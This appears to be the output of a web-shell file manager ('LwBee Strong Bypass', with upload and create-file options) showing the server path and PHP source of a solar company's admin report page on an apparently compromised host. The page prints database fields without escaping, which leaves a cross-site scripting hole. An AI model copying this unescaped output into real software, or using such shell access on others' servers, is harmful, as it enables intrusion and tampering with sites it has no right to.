/home3/vehiclea/public_html/admin-suryasolarsystems-com/about_reports.php
<?php
$_SESSION['active'] = 'aboutReport';
include 'header.php';
include 'sidelinks.php';
include 'functions.php';
$about_selectAll = about_selectAll();
?>
<div class="content-wrapper">
<div class="container-xxl flex-grow-1 container-p-y">
<h4 class="fw-bold py-3 mb-4">Projects Report</h4>
<div class="row">
<div class="col-xxl">
<div class="card mb-6">
<div class="card-header d-flex align-items-center justify-content-between">
<h5 class="mb-0">Reports</h5>
<small class="text-muted float-end">Default label</small>
</div>
<div class="card-body">
<div id="update">
<?php
if(!empty($_GET['upd'])){
?>
<div align="center">
<h4 style="color:green;">About Data Updated Successfully </h4>
</div>
<?php
}
?>
</div>
<div align="center" style="display: none;" id="delete">
<h4 style="color:red;">About Data Deleted Successfully </h4>
</div>
<div>
<table class="table">
<thead>
<tr>
<td>#</td>
<th>Image</th>
<td>Name</td>
<th>Content</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<?php
$i=1;
while($row = mysqli_fetch_array($about_selectAll)){
?>
<tr>
<td><?= $i?></td>
<td><img src="<?= $row['image']?>" style="width:50px; height: 5vh;"></td>
<td><?= strtoupper($row['name'])?></td>
<td><?= $row['content']?></td>
<td>
<a href="about_edit.php?edit=<?= $row['id']?>" class="btn btn-primary">Edit</a>
<a href="javascript:void();" onclick="confirmDelete(<?= $row['id']?>)" class="btn btn-danger">Delete</a>
</td>
</tr>
<?php
$i++;
}
?>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
<?php
include 'footer.php';
?>
<script>
function confirmDelete(aboutid)
{
if (aboutid != '') {
var x = confirm('Are you sure to Delete?');
if(x){
$.ajax({
url : "delete.php",
data : {aboutid : aboutid},
type : 'POST',
success : function(response) {
if(response ==1){
$('#delete').show();
$('#update').hide();
window.location.href = "about_reports.php";
}
}
});
}
}
}
</script>
@LwBee Strong Bypass
Upload File
Create New File